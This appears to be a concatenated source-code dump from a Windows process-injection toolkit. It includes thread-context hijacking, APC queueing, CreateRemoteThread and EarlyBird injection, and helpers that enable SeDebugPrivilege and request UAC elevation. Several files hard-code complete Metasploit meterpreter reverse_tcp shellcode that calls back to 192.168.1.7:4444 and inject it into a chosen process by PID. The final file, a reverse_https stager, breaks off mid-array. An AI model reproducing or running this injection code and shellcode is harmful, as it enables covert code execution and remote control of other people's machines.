2 | 3 | 4 | HANDLE GetFirstThead(DWORD dwPID) { 5 | HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0x0); 6 | HANDLE hThread = NULL; 7 | 8 | THREADENTRY32 te{}; 9 | te.dwSize = sizeof(THREADENTRY32); 10 | 11 | if (!Thread32First(hSnap, &te)) { 12 | CloseHandle(hSnap); 13 | return hThread; 14 | } 15 | 16 | do { 17 | if (te.th32OwnerProcessID == dwPID) { 18 | // SET_CONTEXT is used to change the values of the registers 19 | // GET_CONTEXT is used to retrieve the initial values of the registers 20 | // SUSPEND and RESUME are required because instruction pointer can not be changed for running thread 21 | hThread = OpenThread(THREAD_SET_CONTEXT | THREAD_GET_CONTEXT | THREAD_SUSPEND_RESUME, FALSE, te.th32ThreadID); 22 | if (hThread != NULL) { 23 | break; 24 | } 25 | } 26 | } while (Thread32Next(hSnap, &te)); 27 | 28 | CloseHandle(hSnap); 29 | return hThread; 30 | } 31 | 32 | 33 | BOOL DoInjection(HANDLE hProcess, HANDLE hThread, LPCSTR lpDllPath) { 34 | #ifdef _WIN64 35 | BYTE code[] = { 36 | // sub rsp, 28h 37 | 0x48, 0x83, 0xec, 0x28, 38 | // mov [rsp + 18], rax 39 | 0x48, 0x89, 0x44, 0x24, 0x18, 40 | // mov [rsp + 10h], rcx 41 | 0x48, 0x89, 0x4c, 0x24, 0x10, 42 | // mov rcx, 11111111111111111h 43 | 0x48, 0xb9, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 44 | // mov rax, 22222222222222222h 45 | 0x48, 0xb8, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 46 | // call rax 47 | 0xff, 0xd0, 48 | // mov rcx, [rsp + 10h] 49 | 0x48, 0x8b, 0x4c, 0x24, 0x10, 50 | // mov rax, [rsp + 18h] 51 | 0x48, 0x8b, 0x44, 0x24, 0x18, 52 | // add rsp, 28h 53 | 0x48, 0x83, 0xc4, 0x28, 54 | // mov r11, 333333333333333333h 55 | 0x49, 0xbb, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 56 | // jmp r11 57 | 0x41, 0xff, 0xe3 58 | }; 59 | #else 60 | BYTE code[] = { 61 | 0x60, 62 | 0x68, 0x11, 0x11, 0x11, 0x11, 63 | 0xb8, 0x22, 0x22, 0x22, 0x22, 64 | 0xff, 0xd0, 65 | 0x61, 66 | 0x68, 0x33, 0x33, 0x33, 0x33, 67 | 0xc3 68 | }; 69 | #endif 70 | if (SuspendThread(hThread) == -1) { 71 | return FALSE; 72 | } 73 | 74 | LPVOID lpBuffer = VirtualAllocEx( 75 | hProcess, 76 | nullptr, 77 | PAGE_SIZE, 78 | MEM_RESERVE | MEM_COMMIT, 79 | PAGE_EXECUTE_READWRITE 80 | ); 81 | if (lpBuffer == nullptr) { 82 | ResumeThread(hThread); 83 | return FALSE; 84 | } 85 | 86 | CONTEXT ctx{}; 87 | ctx.ContextFlags = CONTEXT_ALL; 88 | 89 | if (!GetThreadContext(hThread, &ctx)) { 90 | ResumeThread(hThread); 91 | return FALSE; 92 | } 93 | 94 | HMODULE hKernel32 = GetModuleHandleA("kernel32.dll"); 95 | if (hKernel32 == NULL) { 96 | ResumeThread(hThread); 97 | return FALSE; 98 | } 99 | 100 | LPVOID lpLoadLibraryA = GetProcAddress(hKernel32, "LoadLibraryA"); 101 | if (lpLoadLibraryA == NULL) { 102 | ResumeThread(hThread); 103 | return FALSE; 104 | } 105 | 106 | #ifdef _WIN64 107 | * (LPVOID*)(code + 0x10) = (LPVOID)((CHAR*)lpBuffer + (PAGE_SIZE / 2)); 108 | *(LPVOID*)(code + 0x1a) = lpLoadLibraryA; 109 | *(PLONGLONG)(code + 0x34) = ctx.Rip; 110 | #else 111 | * (LPVOID*)(code + 2) = (LPVOID)((CHAR*)lpBuffer + (PAGE_SIZE / 2)); 112 | *(LPVOID*)(code + 7) = lpLoadLibraryA; 113 | *(PUINT)(code + 0xf) = ctx.Eip; 114 | #endif 115 | 116 | if (!WriteProcessMemory( 117 | hProcess, 118 | lpBuffer, 119 | code, 120 | sizeof(code), 121 | nullptr 122 | )) { 123 | ResumeThread(hThread); 124 | return FALSE; 125 | } 126 | 127 | if (!WriteProcessMemory( 128 | hProcess, 129 | (CHAR*)lpBuffer + (PAGE_SIZE / 2), 130 | lpDllPath, 131 | strlen(lpDllPath), 132 | nullptr 133 | )) { 134 | ResumeThread(hThread); 135 | return FALSE; 136 | } 137 | 138 | #ifdef _WIN64 139 | ctx.Rip = (ULONGLONG)lpBuffer; 140 | #else 141 | ctx.Eip = (DWORD)lpBuffer; 142 | #endif 143 | 144 | if (!SetThreadContext(hThread, &ctx)) { 145 | ResumeThread(hThread); 146 | return FALSE; 147 | } 148 | 149 | ResumeThread(hThread); 150 | return TRUE; 151 | } 152 | -------------------------------------------------------------------------------- /Process Listing/PS Api/pch.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "Shell32.lib") 8 | 9 | /// 10 | /// Format the error message and print the human-readable message from GetLastError() 11 | /// 12 | /// Name of the function 13 | /// Whether to exit the program after displaying error message of not. By default it is FALSE 14 | VOID PrintError(LPCSTR Function, BOOL Exit = FALSE) { 15 | // Get the latest error id 16 | DWORD ErrId = GetLastError(); 17 | std::cout << "[ERR:" << ErrId << "] " << Function << ": "; 18 | 19 | // Pring the error message based on the response 20 | if (ErrId == 0) { 21 | std::cout << "Something went wrong"; 22 | } else { 23 | std::cout << std::system_category().message(ErrId); 24 | } 25 | 26 | std::cout << std::endl; 27 | 28 | // If exit flag is set, quit application with error return code 29 | if (Exit) { 30 | exit(1); 31 | } 32 | } 33 | 34 | /// 35 | /// Add "SeDebugPrivilege" to the current running process by adjusting token privileges and verify the details. 36 | /// NOTE: The verification process is needed because AdjustTokenPrivileges function succeeds even if the privilege is not added 37 | /// 38 | /// TRUE if privilege is added and exists in the query result, otherwise false (also if any function is failed) 39 | BOOL AddSeDebugPrivileges() { 40 | // Get the current process handle 41 | DWORD dwPid = GetCurrentProcessId(); 42 | HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid); 43 | if (hProc == NULL || hProc == INVALID_HANDLE_VALUE) { 44 | PrintError("OpenProcess()"); 45 | return FALSE; 46 | } 47 | 48 | // Get the token handle with query information and adjust privileges access 49 | HANDLE hTok = NULL; 50 | if (!OpenProcessToken(hProc, TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hTok)) { 51 | PrintError("OpenProcessToken()"); 52 | return FALSE; 53 | } else if (hTok == NULL || hTok == INVALID_HANDLE_VALUE) { 54 | PrintError("OpenProcessToken()"); 55 | return FALSE; 56 | } 57 | 58 | // Get the value of SeDebugPrivilege from text 59 | LUID pDebugPriv; 60 | if (!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &pDebugPriv)) { 61 | PrintError("LookupPrivilegeValueA()"); 62 | return FALSE; 63 | } 64 | 65 | // Adjust token privilege 66 | TOKEN_PRIVILEGES tokPrivs; 67 | tokPrivs.PrivilegeCount = 1; 68 | tokPrivs.Privileges[0].Luid = pDebugPriv; 69 | tokPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 70 | if (!AdjustTokenPrivileges(hTok, FALSE, &tokPrivs, sizeof(tokPrivs), NULL, NULL)) { 71 | PrintError("AdjustTokenPrivileges()"); 72 | return FALSE; 73 | } 74 | 75 | // Query token privileges to confirm whether 76 | BOOL bRes; 77 | PRIVILEGE_SET tokPrivSet; 78 | tokPrivSet.Control = PRIVILEGE_SET_ALL_NECESSARY; 79 | tokPrivSet.PrivilegeCount = 1; 80 | tokPrivSet.Privilege[0].Luid = pDebugPriv; 81 | if (!PrivilegeCheck(hTok, &tokPrivSet, &bRes)) { 82 | PrintError("PrivilegeCheck()"); 83 | return FALSE; 84 | } 85 | 86 | CloseHandle(hProc); 87 | CloseHandle(hTok); 88 | hProc = NULL; 89 | hTok = NULL; 90 | 91 | return bRes; 92 | } 93 | 94 | /// 95 | /// Launch an elevated process with administator privilegesand exit the current process 96 | /// 97 | VOID SpawnElevatedProcess() { 98 | // Get current process image file path 99 | CHAR szFileName[MAX_PATH]; 100 | if (!GetModuleFileNameA(NULL, szFileName, MAX_PATH)) { 101 | PrintError("GetModuleFileNameA()", TRUE); 102 | } 103 | 104 | // Craft the file execution information for ShellExecuteExA function 105 | SHELLEXECUTEINFOA si; 106 | si.cbSize = sizeof(SHELLEXECUTEINFOA); 107 | si.fMask = SEE_MASK_DEFAULT; 108 | si.hwnd = NULL; 109 | si.lpVerb = "runas"; // to show UAC window 110 | si.lpFile = szFileName; 111 | si.lpParameters = NULL; 112 | si.lpDirectory = NULL; 113 | si.nShow = SW_NORMAL; 114 | 115 | // Start the process with elevated UAC 116 | if (!ShellExecuteExA(&si)) { 117 | PrintError("ShellExecuteExA()", TRUE); 118 | } 119 | 120 | // Exit the current process as it is no longer needed 121 | exit(1); 122 | } 123 | -------------------------------------------------------------------------------- /Process Injection/APC Thread Injection/Source.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | #include "process_utils.h" 3 | 4 | INT main(INT argc, LPSTR argv[]) { 5 | if (argc < 2) { 6 | std::cerr << "Usage: " << argv[0] << " PID\n"; 7 | return 0x1; 8 | } 9 | 10 | /* 11 | * windows/x64/meterpreter/reverse_tcp - 449 bytes (stage 1) 12 | * https://metasploit.com/ 13 | * VERBOSE=false, LHOST=192.168.1.7, LPORT=4444, 14 | * ReverseAllowProxy=false, ReverseListenerThreaded=false, 15 | * StagerRetryCount=10, StagerRetryWait=5, PingbackRetries=0, 16 | * PingbackSleep=30, PayloadUUIDTracking=false, 17 | * EnableStageEncoding=false, StageEncoderSaveRegisters=, 18 | * StageEncodingFallback=true, PrependMigrate=false, 19 | * EXITFUNC=thread, AutoLoadStdapi=true, 20 | * AutoVerifySessionTimeout=30, InitialAutoRunScript=, 21 | * AutoRunScript=, AutoSystemInfo=true, 22 | * EnableUnicodeEncoding=false, SessionRetryTotal=3600, 23 | * SessionRetryWait=10, SessionExpirationTimeout=604800, 24 | * SessionCommunicationTimeout=300, PayloadProcessCommandLine=, 25 | * AutoUnhookProcess=false 26 | */ 27 | BYTE buf[] = 28 | "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52" 29 | "\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" 30 | "\x20\x51\x56\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x8b\x72\x50" 31 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 32 | "\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0" 33 | "\x41\x51\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b" 34 | "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b" 35 | "\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41" 36 | "\x8b\x34\x88\x4d\x31\xc9\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9" 37 | "\x0d\xac\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45" 38 | "\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b" 39 | "\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" 40 | "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48" 41 | "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9" 42 | "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00" 43 | "\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5" 44 | "\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x01\x07\x41\x54\x49\x89\xe4" 45 | "\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68" 46 | "\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a" 47 | "\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89" 48 | "\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5" 49 | "\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba" 50 | "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\x49\xff\xce\x75\xe5" 51 | "\x68\xf0\xb5\xa2\x56\xff\xd5\x48\x83\xec\x10\x48\x89\xe2\x4d" 52 | "\x31\xc9\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f" 53 | "\xff\xd5\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00" 54 | "\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4" 55 | "\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89" 56 | "\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5" 57 | "\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41\xff\xe7"; 58 | 59 | 60 | 61 | // Convert the first occurence of the digits in string to base10 numerical 62 | LPSTR _ptr = nullptr; 63 | DWORD dwPID = strtoul(argv[1], &_ptr, 10); 64 | 65 | 66 | HANDLE hProcess = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, dwPID); 67 | if (hProcess == NULL) { 68 | PrintError("OpenProcess()", TRUE); 69 | } 70 | 71 | LPVOID lpBuffer = VirtualAllocEx(hProcess, nullptr, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 72 | if (lpBuffer == nullptr) { 73 | PrintError("VirtualAllocEx()", TRUE); 74 | } 75 | 76 | if (!WriteProcessMemory(hProcess, lpBuffer, (LPCVOID)buf, 449, nullptr)) { 77 | PrintError("WriteProcessMemory()", TRUE); 78 | } 79 | 80 | PTHREAD_STACK lpThreads = GetProcessThreads(dwPID); 81 | if (lpThreads == nullptr || lpThreads->size() == 0x0) { 82 | PrintError("GetProcessThreads()", TRUE); 83 | } 84 | 85 | 86 | HANDLE hThread = NULL; 87 | 88 | while (!lpThreads->empty()) { 89 | hThread = *lpThreads->top(); 90 | 91 | // Queue user APC on the current thread handle of the process 92 | // If the thread is in alertable state, it will execute the thre 93 | QueueUserAPC((PAPCFUNC)lpBuffer, hThread, NULL); 94 | CloseHandle(hThread); 95 | Sleep(200); 96 | 97 | lpThreads->pop(); 98 | } 99 | 100 | std::cout << "All APC Sent!\n"; 101 | 102 | delete lpThreads; 103 | lpThreads = nullptr; 104 | CloseHandle(hProcess); 105 | 106 | return 0x0; 107 | } -------------------------------------------------------------------------------- /Process Injection/CreateRemoteThread Shellcode/Source.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | 3 | // In this everythis is same as CreateRemoteThread DLL but instead of LoadLibrary address, directly call the starting address of the shellcode. 4 | 5 | INT main(INT argc, LPSTR argv[]) { 6 | /* 7 | * windows/x64/meterpreter/reverse_tcp - 449 bytes (stage 1) 8 | * https://metasploit.com/ 9 | * VERBOSE=false, LHOST=192.168.1.7, LPORT=4444, 10 | * ReverseAllowProxy=false, ReverseListenerThreaded=false, 11 | * StagerRetryCount=10, StagerRetryWait=5, PingbackRetries=0, 12 | * PingbackSleep=30, PayloadUUIDTracking=false, 13 | * EnableStageEncoding=false, StageEncoderSaveRegisters=, 14 | * StageEncodingFallback=true, PrependMigrate=false, 15 | * EXITFUNC=thread, AutoLoadStdapi=true, 16 | * AutoVerifySessionTimeout=30, InitialAutoRunScript=, 17 | * AutoRunScript=, AutoSystemInfo=true, 18 | * EnableUnicodeEncoding=false, SessionRetryTotal=3600, 19 | * SessionRetryWait=10, SessionExpirationTimeout=604800, 20 | * SessionCommunicationTimeout=300, PayloadProcessCommandLine=, 21 | * AutoUnhookProcess=false 22 | */ 23 | BYTE shellcode[] = 24 | "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52" 25 | "\x51\x48\x31\xd2\x56\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 26 | "\x8b\x52\x20\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x8b\x72\x50" 27 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 28 | "\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41\x51\x8b\x42\x3c\x48" 29 | "\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b" 30 | "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x44\x8b" 31 | "\x40\x20\x49\x01\xd0\x8b\x48\x18\x50\xe3\x56\x48\xff\xc9\x41" 32 | "\x8b\x34\x88\x4d\x31\xc9\x48\x01\xd6\x48\x31\xc0\xac\x41\xc1" 33 | "\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45" 34 | "\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b" 35 | "\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" 36 | "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48" 37 | "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9" 38 | "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00" 39 | "\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5" 40 | "\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x01\x07\x41\x54\x49\x89\xe4" 41 | "\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68" 42 | "\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a" 43 | "\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89" 44 | "\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5" 45 | "\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba" 46 | "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\x49\xff\xce\x75\xe5" 47 | "\x68\xf0\xb5\xa2\x56\xff\xd5\x48\x83\xec\x10\x48\x89\xe2\x4d" 48 | "\x31\xc9\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f" 49 | "\xff\xd5\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00" 50 | "\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4" 51 | "\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89" 52 | "\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5" 53 | "\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41\xff\xe7"; 54 | if (argc < 2) { 55 | std::cerr << "Usage: " << argv[0] << " PID\n"; 56 | return 0x1; 57 | } 58 | 59 | DWORD dwPID = atoll(argv[1]); 60 | 61 | HANDLE hProcess = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, FALSE, dwPID); 62 | if (hProcess == NULL) { 63 | PrintError("OpenProcess()", TRUE); 64 | return 0x1; 65 | } 66 | 67 | LPVOID lpBuffer = VirtualAllocEx(hProcess, nullptr, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 68 | if (lpBuffer == nullptr) { 69 | CloseHandle(hProcess); 70 | hProcess = nullptr; 71 | 72 | PrintError("VirtualAllocEx()", TRUE); 73 | return 0x1; 74 | } 75 | 76 | if (!WriteProcessMemory(hProcess, lpBuffer, (LPCVOID)shellcode, 449, nullptr)) { 77 | VirtualFreeEx(hProcess, lpBuffer, 0x0, MEM_RELEASE); 78 | lpBuffer = nullptr; 79 | 80 | CloseHandle(hProcess); 81 | hProcess = nullptr; 82 | 83 | PrintError("WriteProcessMemory()", TRUE); 84 | return 0x1; 85 | } 86 | 87 | HANDLE hThread = CreateRemoteThread(hProcess, nullptr, NULL, (LPTHREAD_START_ROUTINE)lpBuffer, NULL, NULL, nullptr); 88 | if (hThread == NULL) { 89 | VirtualFreeEx(hProcess, lpBuffer, 0x0, MEM_RELEASE); 90 | lpBuffer = nullptr; 91 | 92 | CloseHandle(hProcess); 93 | hProcess = nullptr; 94 | 95 | PrintError("WriteProcessMemory()", TRUE); 96 | return 0x1; 97 | } 98 | 99 | std::cout << "Injected Shellcode\n"; 100 | 101 | CloseHandle(hProcess); 102 | CloseHandle(hThread); 103 | hProcess = hThread = nullptr; 104 | 105 | return 0x0; 106 | } -------------------------------------------------------------------------------- /Process Listing/WTS Api/pch.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "Shell32.lib") 8 | 9 | /// 10 | /// Format the error message and print the human-readable message from GetLastError() 11 | /// 12 | /// Name of the function 13 | /// Whether to exit the program after displaying error message of not. By default it is FALSE 14 | VOID PrintError(LPCSTR Function, BOOL Exit = FALSE) { 15 | // Get the latest error id 16 | DWORD ErrId = GetLastError(); 17 | std::cout << "[ERR:" << ErrId << "] " << Function << ": "; 18 | 19 | // Pring the error message based on the response 20 | if (ErrId == 0) { 21 | std::cout << "Something went wrong"; 22 | } else { 23 | std::cout << std::system_category().message(ErrId); 24 | } 25 | 26 | std::cout << std::endl; 27 | 28 | // If exit flag is set, quit application with error return code 29 | if (Exit) { 30 | exit(1); 31 | } 32 | } 33 | 34 | 35 | /// 36 | /// Add "SeDebugPrivilege" to the current running process by adjusting token privileges and verify the details. 37 | /// NOTE: The verification process is needed because AdjustTokenPrivileges function succeeds even if the privilege is not added 38 | /// 39 | /// TRUE if privilege is added and exists in the query result, otherwise false (also if any function is failed) 40 | BOOL AddSeDebugPrivileges() { 41 | // Get the current process handle 42 | DWORD dwPid = GetCurrentProcessId(); 43 | HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid); 44 | if (hProc == NULL) { 45 | PrintError("OpenProcess()"); 46 | return FALSE; 47 | } 48 | 49 | // Get the token handle with query information and adjust privileges access 50 | HANDLE hTok = INVALID_HANDLE_VALUE; 51 | if (!OpenProcessToken(hProc, TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hTok)) { 52 | PrintError("OpenProcessToken()"); 53 | return FALSE; 54 | } else if(hTok == NULL || hTok == INVALID_HANDLE_VALUE) { 55 | PrintError("OpenProcessToken()"); 56 | return FALSE; 57 | } 58 | 59 | // Get the value of SeDebugPrivilege from text 60 | LUID pDebugPriv; 61 | if (!LookupPrivilegeValueA(nullptr, "SeDebugPrivilege", &pDebugPriv)) { 62 | PrintError("LookupPrivilegeValueA()"); 63 | return FALSE; 64 | } 65 | 66 | // Adjust token privilege 67 | TOKEN_PRIVILEGES tokPrivs; 68 | tokPrivs.PrivilegeCount = 1; 69 | tokPrivs.Privileges[0].Luid = pDebugPriv; 70 | tokPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 71 | if (!AdjustTokenPrivileges(hTok, FALSE, &tokPrivs, NULL, nullptr, nullptr)) { 72 | PrintError("AdjustTokenPrivileges()"); 73 | return FALSE; 74 | } 75 | 76 | // Query token privileges to confirm whether 77 | BOOL bRes; 78 | PRIVILEGE_SET tokPrivSet; 79 | tokPrivSet.Control = PRIVILEGE_SET_ALL_NECESSARY; 80 | tokPrivSet.PrivilegeCount = 1; 81 | tokPrivSet.Privilege[0].Luid = pDebugPriv; 82 | if (!PrivilegeCheck(hTok, &tokPrivSet, &bRes)) { 83 | PrintError("PrivilegeCheck()"); 84 | return FALSE; 85 | } 86 | 87 | CloseHandle(hProc); 88 | CloseHandle(hTok); 89 | hProc = nullptr; 90 | hTok = nullptr; 91 | 92 | return bRes; 93 | } 94 | 95 | /// 96 | /// Launch an elevated process with administator privilegesand exit the current process 97 | /// 98 | VOID SpawnElevatedProcess() { 99 | // Get current process image file path 100 | CHAR szFileName[MAX_PATH]; 101 | if (!GetModuleFileNameA(nullptr, szFileName, MAX_PATH)) { 102 | PrintError("GetModuleFileNameA()", TRUE); 103 | } 104 | 105 | // Craft the file execution information for ShellExecuteExA function 106 | SHELLEXECUTEINFOA si; 107 | si.cbSize = sizeof(SHELLEXECUTEINFOA); 108 | si.fMask = SEE_MASK_DEFAULT; 109 | si.hwnd = nullptr; 110 | si.lpVerb = "runas"; // to show UAC window 111 | si.lpFile = szFileName; 112 | si.lpParameters = nullptr; 113 | si.lpDirectory = nullptr; 114 | si.nShow = SW_NORMAL; 115 | 116 | // Start the process with elevated UAC 117 | if (!ShellExecuteExA(&si)) { 118 | PrintError("ShellExecuteExA()", TRUE); 119 | } 120 | 121 | // Exit the current process as it is no longer needed 122 | exit(1); 123 | } 124 | 125 | /// 126 | /// Get the serialized name of the type of SID from SID_NAME_USE value 127 | /// 128 | /// SID type value obtained from LookupAccountSidA() 129 | /// Serialized SID type 130 | LPCSTR GetSidType(SID_NAME_USE nUse) { 131 | switch (nUse) { 132 | case SidTypeAlias: 133 | return "Alias"; 134 | case SidTypeComputer: 135 | return "Computer"; 136 | case SidTypeDeletedAccount: 137 | return "Deleted Account"; 138 | case SidTypeDomain: 139 | return "Domain"; 140 | case SidTypeGroup: 141 | return "Group"; 142 | case SidTypeInvalid: 143 | return "Invalid"; 144 | case SidTypeLabel: 145 | return "Label"; 146 | case SidTypeLogonSession: 147 | return "Logon Session"; 148 | case SidTypeUnknown: 149 | return "Unknown"; 150 | case SidTypeUser: 151 | return "User"; 152 | case SidTypeWellKnownGroup: 153 | return "Well Known Group"; 154 | default: 155 | return "N/A"; 156 | } 157 | } -------------------------------------------------------------------------------- /Process Injection/EarlyBird APC/Source.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | 3 | 4 | INT main(INT argc, LPSTR argv[]) { 5 | if (argc < 2) { 6 | std::cerr << "Usage: " << argv[0] << " \n"; 7 | return 0x1; 8 | } 9 | 10 | /* 11 | * windows/x64/meterpreter/reverse_https - 717 bytes (stage 1) 12 | * https://metasploit.com/ 13 | * VERBOSE=false, SSLVersion=TLS1.2, LHOST=192.168.1.7, 14 | * LPORT=3306, ReverseAllowProxy=false, PingbackRetries=0, 15 | * PingbackSleep=30, LURI=, OverrideRequestHost=false, 16 | * HttpUserAgent=Mozilla/5.0 (iPad; CPU OS 15_3_1 like Mac OS 17 | * X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 18 | * Mobile/15E148 Safari/604.1, HttpServerName=Apache, 19 | * HttpUnknownRequestResponse=

It 20 | * works!

, IgnoreUnknownPayloads=false, 21 | * StagerVerifySSLCert=false, PayloadUUIDTracking=false, 22 | * EnableStageEncoding=false, StageEncoderSaveRegisters=, 23 | * StageEncodingFallback=true, PrependMigrate=false, 24 | * EXITFUNC=thread, StagerRetryCount=10, StagerRetryWait=5, 25 | * HttpProxyType=HTTP, AutoLoadStdapi=true, 26 | * AutoVerifySessionTimeout=30, InitialAutoRunScript=, 27 | * AutoRunScript=, AutoSystemInfo=true, 28 | * EnableUnicodeEncoding=false, SessionRetryTotal=3600, 29 | * SessionRetryWait=10, SessionExpirationTimeout=604800, 30 | * SessionCommunicationTimeout=300, PayloadProcessCommandLine=, 31 | * AutoUnhookProcess=false 32 | */ 33 | BYTE buf[] = 34 | "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52" 35 | "\x48\x31\xd2\x65\x48\x8b\x52\x60\x51\x48\x8b\x52\x18\x56\x48" 36 | "\x8b\x52\x20\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x8b\x72\x50" 37 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 38 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 39 | "\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b" 40 | "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x8b\x48" 41 | "\x18\x44\x8b\x40\x20\x50\x49\x01\xd0\xe3\x56\x48\xff\xc9\x4d" 42 | "\x31\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9" 43 | "\x0d\xac\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45" 44 | "\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b" 45 | "\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58" 46 